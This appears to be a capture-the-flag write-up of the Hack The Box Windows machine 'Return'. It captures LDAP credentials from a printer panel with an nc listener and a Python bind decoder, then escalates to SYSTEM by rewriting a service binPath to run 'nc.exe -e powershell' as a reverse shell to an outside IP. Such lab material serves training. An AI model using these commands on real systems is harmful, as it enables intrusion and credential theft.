Return-htb-writeup

0x00 Skills covered

Skills in this chapter: LDAP, listening on port 389, Responder, privileged user groups, Server Operators, privilege escalation by reconfiguring a service with sc.exe

Reference links: none; the box was solved directly from its description.

0x01 Getting user access

1. Machine description

Return is an easy-difficulty Windows machine featuring a network printer administration panel that stores LDAP credentials. These credentials can be captured by entering a malicious LDAP server, which allows a foothold on the server through the WinRM service. The user is found to be a member of a privileged group, which is further exploited to gain system access.

2. Target IP address: 10.10.11.108

3. Enumerate the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.108
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-08 23:57 CST
Warning: 10.10.11.108 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.108
Host is up (0.12s latency).
Not shown: 64998 closed tcp ports (reset), 511 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49681/tcp open unknown
49738/tcp open unknown
64965/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 22.62 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49678,49681,49738,64965,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap 10.10.11.108 --min-rate=10000 -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49678,49681,49738,64965 -sC -sV -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-08 23:59 CST
Nmap scan report for 10.10.11.108
Host is up (0.15s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-05-08 08:14:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49738/tcp open msrpc Microsoft Windows RPC
64965/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-05-08T08:15:11
|_ start_date: N/A
|_clock-skew: -7h45m42s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.56 seconds

4. First add the domain name found above (return.local, host PRINTER) to the local hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.108 printer.return.local return.local" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.108 printer.return.local return.local

5. Have a look at the web service on port 80

http://10.10.11.108/index.php

http://10.10.11.108/settings.php

The settings page shows the printer's LDAP configuration as four form fields: server address printer.return.local, server port 389, username svc-printer, and a masked password (*******). The server address is editable, and that is the whole attack surface here.

6. After some poking around: start an nc listener on port 389 (needs root), change the server address in the settings form to our own IP (10.10.14.11) and submit it, so the web application connects back to us with the stored credentials

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 61852
0*`%return\svc-printer�
1edFg43012!!
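The bytes nc printed are a raw LDAPv3 simple BindRequest: `0*` is the outer SEQUENCE tag and length, `` `% `` is the BindRequest tag and length, and the unprintable bytes in between are the BER tags and lengths of the messageID, version, bind name and password. The decoder below is an added example, not code from the original writeup; it parses that structure, rejects anything that is not a simple bind (a SASL bind carries no cleartext password), and answers with a BindResponse so the client sees a successful bind. `SAMPLE_BIND` is a byte string constructed here to match the fields nc showed, and `serve_once()` is a hypothetical helper that does what the nc listener did, with the same need for root to bind port 389.

```python
"""Decode the LDAPv3 simple BindRequest (RFC 4511, section 4.2) that the printer
panel sends to whatever "server address" it is given.  Added example, not code
from the original writeup; SAMPLE_BIND is constructed to match nc's output."""
import socket

TAG_SEQUENCE = 0x30       # LDAPMessage ::= SEQUENCE { messageID, protocolOp }
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_ENUMERATED = 0x0A
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
TAG_BIND_RESPONSE = 0x61  # [APPLICATION 1] constructed
TAG_SIMPLE_AUTH = 0x80    # authentication CHOICE, simple [0] OCTET STRING

# Constructed sample: the 44 bytes a simple bind for svc-printer consists of.
# The printable bytes are exactly what nc showed ("0*", "`%", DN, password).
SAMPLE_BIND = (
    b"\x30\x2a"                          # SEQUENCE, 42 bytes        -> "0*"
    b"\x02\x01\x01"                      # messageID 1
    b"\x60\x25"                          # BindRequest, 37 bytes     -> "`%"
    b"\x02\x01\x03"                      # version 3
    b"\x04\x12" b"return\\svc-printer"   # name, 18-byte OCTET STRING
    b"\x80\x0c" b"1edFg43012!!"          # simple authentication, 12 bytes
)


def _read_tlv(buf: bytes, pos: int):
    """Read one BER tag/length/value at pos; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                    # long-form length: 0x8N then N bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER element")
    return tag, value, pos + length


def parse_bind_request(msg: bytes) -> dict:
    """Return messageID, version, name and password of a simple BindRequest.
    Raises ValueError for any other LDAP operation or for a SASL bind."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, msg_id, pos = _read_tlv(body, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, bind, _ = _read_tlv(body, pos)
    if tag != TAG_BIND_REQUEST:
        raise ValueError("protocolOp is not a BindRequest (tag 0x%02x)" % tag)
    vtag, version, pos = _read_tlv(bind, 0)
    ntag, name, pos = _read_tlv(bind, pos)
    atag, auth, _ = _read_tlv(bind, pos)
    if vtag != TAG_INTEGER or ntag != TAG_OCTET_STRING:
        raise ValueError("malformed BindRequest")
    if atag != TAG_SIMPLE_AUTH:
        # SASL binds (tag 0xA3) carry no cleartext password; PHP's ldap_bind()
        # called with a DN and password always sends a simple bind.
        raise ValueError("not a simple bind (authentication tag 0x%02x)" % atag)
    return {
        "message_id": int.from_bytes(msg_id, "big"),
        "version": int.from_bytes(version, "big"),
        "name": name.decode(),
        "password": auth.decode(),
    }


def build_bind_response(message_id: int, result_code: int = 0) -> bytes:
    """Encode a BindResponse (success by default) so the client does not hang.
    Short-form lengths and a one-byte messageID suffice for these messages."""
    result = (bytes([TAG_ENUMERATED, 1, result_code])
              + bytes([TAG_OCTET_STRING, 0])     # matchedDN ""
              + bytes([TAG_OCTET_STRING, 0]))    # diagnosticMessage ""
    op = bytes([TAG_BIND_RESPONSE, len(result)]) + result
    body = bytes([TAG_INTEGER, 1, message_id]) + op
    return bytes([TAG_SEQUENCE, len(body)]) + body


def serve_once(bind_addr: str = "0.0.0.0", port: int = 389) -> dict:
    """Hypothetical stand-in for the nc listener: accept one client, decode its
    bind, answer success and return the credentials.  Port 389 needs root."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            # one recv() is enough for a bind this small; a real server would
            # keep reading until the outer SEQUENCE length is satisfied
            creds = parse_bind_request(conn.recv(4096))
            conn.sendall(build_bind_response(creds["message_id"]))
    creds["client"] = peer[0]
    return creds


if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_BIND))
```

Run it as-is to decode the sample; on the attacking host call `serve_once()` (as root), then submit the panel's settings form with that host's IP as the server address. The credentials arrive in cleartext only because the panel uses plain ldap:// with no StartTLS; over LDAPS the same bind would be inside TLS and a listener would see nothing useful.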

7. That gives us a username and password: the readable parts of the nc output are the bind name return\svc-printer and the password 1edFg43012!!, and the unprintable bytes around them are just the BER tags and lengths of the LDAP simple bind. Next, verify that the credentials actually work

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
SMB 10.10.11.108 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB 10.10.11.108 445 PRINTER [+] return.local\svc-printer:1edFg43012!!

8. The password works. As a cleaner alternative to the raw nc capture above, Responder's LDAP server decodes the simple bind and prints the cleartext credentials directly (its LLMNR/NBT-NS/mDNS poisoners play no role here; only the LDAP server on 389 matters)

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]

[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.11]
Responder IPv6 [dead:beef:2::1009]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
Responder Machine Name [WIN-9UR2XUDZ85J]
Responder Domain Name [1GGZ.LOCAL]
Responder DCE-RPC Port [48986]

[+] Listening for events...

[LDAP] Cleartext Client : 10.10.11.108
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg43012!!

9. With working credentials, log in over WinRM (5985 is open) and grab the first flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ls
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ls C:/Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/27/2021 4:40 AM Administrator
d-r--- 5/26/2021 1:50 AM Public
d----- 5/26/2021 1:51 AM svc-printer


*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls


Directory: C:\Users\svc-printer\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 2:14 AM 59392 nc.exe
-ar--- 5/6/2024 7:16 AM 34 user.txt


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cat user.txt
ff13eb37dc232a953a2d3615cb4918f6
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

0x02 Getting SYSTEM access

10. Start enumerating to see what can be found

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> net user svc-printer
User name svc-printer
Full Name SVCPrinter
Comment Service Account for Printer
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 5/26/2021 1:15:13 AM
Password expires Never
Password changeable 5/27/2021 1:15:13 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/8/2024 2:46:55 AM

Logon hours allowed All

Local Group Memberships *Print Operators *Remote Management Use
*Server Operators
Global Group memberships *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

11. At this point I had already noticed the two special groups, Print Operators and Server Operators (the whoami /priv output also lists SeBackupPrivilege and SeRestorePrivilege, which on a domain controller is a separate route that this writeup does not take), but for completeness I went on with automated enumeration tools

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> upload /home/kali/Desktop/tools/winPEASx64.exe .

Info: Uploading /home/kali/Desktop/tools/winPEASx64.exe to C:\Users\svc-printer\Desktop\.

Data: 3183272 bytes of 3183272 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls


Directory: C:\Users\svc-printer\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 2:14 AM 59392 nc.exe
-ar--- 5/6/2024 7:16 AM 34 user.txt
-a---- 5/8/2024 8:08 PM 2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ./winPEASx64.exe

Folder: C:\windows\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]
=================================================================================================


Folder: C:\windows\system32\tasks
FolderPerms: Authenticated Users [WriteData/CreateFiles]

Found PHP_files Files
File: C:\inetpub\wwwroot\settings.php

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cat C:\inetpub\wwwroot\settings.php
<?php
if($_SERVER["REQUEST_METHOD"]=="POST"){
$ldap = ldap_connect($_POST["ip"]);
$bind = ldap_bind($ldap, "return\svc-printer", "1edFg43012!!");
if($bind){
//
}
}
?>

12. This explains why a listener on port 389 received the password: settings.php takes the server address straight from the POST body (`ip`), calls ldap_connect() on it and then does an LDAP simple bind with the hard-coded svc-printer password. A simple bind sends the DN and password in cleartext unless the connection is wrapped in TLS (LDAPS or StartTLS), so whoever controls the address field receives them.

13. Next I also ran SharpHound.exe and analysed the data in BloodHound, which turned up nothing special

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> upload /home/kali/Desktop/tools/SharpHound/SharpHound.exe 

Info: Uploading /home/kali/Desktop/tools/SharpHound/SharpHound.exe to C:\Users\svc-printer\Desktop\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls


Directory: C:\Users\svc-printer\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2024 2:14 AM 59392 nc.exe
-a---- 5/8/2024 8:43 PM 1046528 SharpHound.exe
-ar--- 5/6/2024 7:16 AM 34 user.txt
-a---- 5/8/2024 8:08 PM 2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> .\SharpHound.exe --CollectionMethods All --Domain return.local
2024-05-08T20:55:59.8935815-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-05-08T20:55:59.9873326-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-08T20:56:00.0029701-07:00|INFORMATION|Initializing SharpHound at 8:56 PM on 5/8/2024
2024-05-08T20:56:02.6592161-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for return.local : printer.return.local
2024-05-08T20:56:02.9873405-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-08T20:56:03.0810808-07:00|INFORMATION|Beginning LDAP search for return.local
2024-05-08T20:56:03.0967151-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-05-08T20:56:03.0967151-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-05-08T20:56:33.6279605-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-05-08T20:56:49.3154554-07:00|INFORMATION|Consumers finished, closing output channel
2024-05-08T20:56:49.3310798-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-05-08T20:56:49.5029570-07:00|INFORMATION|Status: 90 objects finished (+90 1.956522)/s -- Using 42 MB RAM
2024-05-08T20:56:49.5029570-07:00|INFORMATION|Enumeration finished in 00:00:46.4239791
2024-05-08T20:56:49.5498315-07:00|INFORMATION|Saving cache with stats: 50 ID to type mappings.
50 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-05-08T20:56:49.5498315-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 PM on 5/8/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls

Directory: C:\Users\svc-printer\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2024 8:56 PM 11221 20240508205649_BloodHound.zip
-a---- 5/8/2024 8:56 PM 7540 M2Y3NjJjNWItMDZjMC00MTJkLWE1MDctODZhMmZhYmExM2Vh.bin
-a---- 5/7/2024 2:14 AM 59392 nc.exe
-a---- 5/8/2024 8:43 PM 1046528 SharpHound.exe
-ar--- 5/6/2024 7:16 AM 34 user.txt
-a---- 5/8/2024 8:08 PM 2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> download 20240508205649_BloodHound.zip

Info: Downloading C:\Users\svc-printer\Desktop\20240508205649_BloodHound.zip to 20240508205649_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

14. So back to the two groups noticed at the start, and a closer look at them

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup "Print Operators"
Alias name Print Operators
Comment Members can administer printers installed on domain controllers

Members

-------------------------------------------------------------------------------
svc-printer
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup "Server Operators"
Alias name Server Operators
Comment Members can administer domain servers

Members

-------------------------------------------------------------------------------
svc-printer
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

15. Membership of Server Operators is very powerful; let's look at how to exploit it

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#yu-kong-zhi-qi-fang-wen

Domain controller access
Access to files on a DC is restricted unless the user is a member of the Server Operators group, which changes the access level.

Privilege escalation
Using Sysinternals PsService or sc, service permissions can be inspected and modified. For example, the Server Operators group has full control over certain services, allowing arbitrary command execution and privilege escalation:

C:\> .\PsService.exe security AppReadiness
This command shows that Server Operators have full access and can manipulate the service to gain elevated privileges.

16. Keep searching online for articles on escalating from this group

Server Operators: they can perform maintenance tasks on domain servers.

https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

17. The article gives step-by-step exploitation, so follow it. First list the services with evil-winrm's built-in `services` command; note that the VMTools and VSS binPaths already point at nc.exe reverse-shell commands towards 10.10.16.27, left behind by someone else on this shared instance. Then point VMTools at the nc.exe already sitting on the Desktop and restart the service

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> services

Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.16.27 4444 True VMTools
C:\programdata\nc.exe -e cmd 10.10.16.27 4444 True VSS
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc

*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e powershell 10.10.14.11 443"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe stop VMTools
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe start VMTools
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

18. Error 1053 is expected: nc.exe is not a real service executable and never reports a running status to the Service Control Manager, so the SCM gives up on the start request after its timeout. The binary is still launched under the service's account before that happens, which is why the listener receives a SYSTEM shell (whoami confirms it). Once the SCM gives up it terminates the process, so the shell is short-lived. On a real engagement record the original binPath with `sc.exe qc VMTools` before changing it and restore it afterwards; here it had already been overwritten, as the listing in step 17 shows. Catch the shell and read the final flag

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 54449
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd C:/Users
cd C:/Users
PS C:\Users> ls
ls


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/27/2021 4:40 AM Administrator
d-r--- 5/26/2021 1:50 AM Public
d----- 5/26/2021 1:51 AM svc-printer


PS C:\Users> cd Administrator
cd Administrator
PS C:\Users\Administrator> cd Desktop
cd Desktop
PS C:\Users\Administrator\Desktop> ls
ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/6/2024 7:16 AM 34 root.txt


PS C:\Users\Administrator\Desktop>
PS C:\Users\Administrator\Desktop> type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
3c61314a046c2f14c1bcce2a663a75f9
PS C:\Windows\system32>

19. The reverse shell spawned from the service is fairly unstable (the SCM terminates it once the start timeout expires), but it stays alive long enough to read the final flag.

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/401


Return-htb-writeup
https://sh1yan.top/2024/05/08/Return-htb-writeup/
Author: shiyan
Published: 8 May 2024